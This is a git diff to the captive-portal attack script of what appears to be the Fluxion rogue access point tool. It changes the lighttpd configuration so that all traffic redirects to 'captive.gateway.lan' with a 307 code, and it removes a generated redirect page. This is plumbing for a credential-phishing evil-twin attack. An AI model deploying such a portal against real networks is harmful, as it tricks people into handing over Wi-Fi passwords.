diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index a347110..29012f0 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -699,7 +699,9 @@ static-file.exclude-extensions = ( ) index-file.names = ( - \"redirect.html\" + \"index.htm\", + \"index.html\", + \"index.php\" ) " >"$FLUXIONWorkspacePath/lighttpd.conf" @@ -731,10 +733,10 @@ index-file.names = ( else echo "\ # Redirect all traffic to the captive portal when not emulating a connection. -\$HTTP[\"host\"] != \"redirect.html\" { - url.redirect-code = 200 +\$HTTP[\"host\"] != \"captive.gateway.lan\" { + url.redirect-code = 307 url.redirect = ( - \"^/(.*)\" => \"http://redirect.html/\", + \"^/(.*)\" => \"http://captive.gateway.lan/\", ) } " >>"$FLUXIONWorkspacePath/lighttpd.conf" @@ -1099,17 +1101,6 @@ captive_portal_generic() { " >"$FLUXIONWorkspacePath/captive_portal/error.html" -echo "\ - - - Redirecting to Captive Portal - - - -

Please wait, refreshing. If page does not refresh, click here to login.

- -" >"$FLUXIONWorkspacePath/captive_portal/redirect.html" - echo "\ @@ -1508,7 +1499,7 @@ start_attack() { "if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" & # Save parent's pid, to get to child later. CaptivePortalDNSServiceXtermPID=$! - + echo -e "$FLUXIONVLine $CaptivePortalStartingWebServiceNotice" lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" \ &> $FLUXIONOutputDevice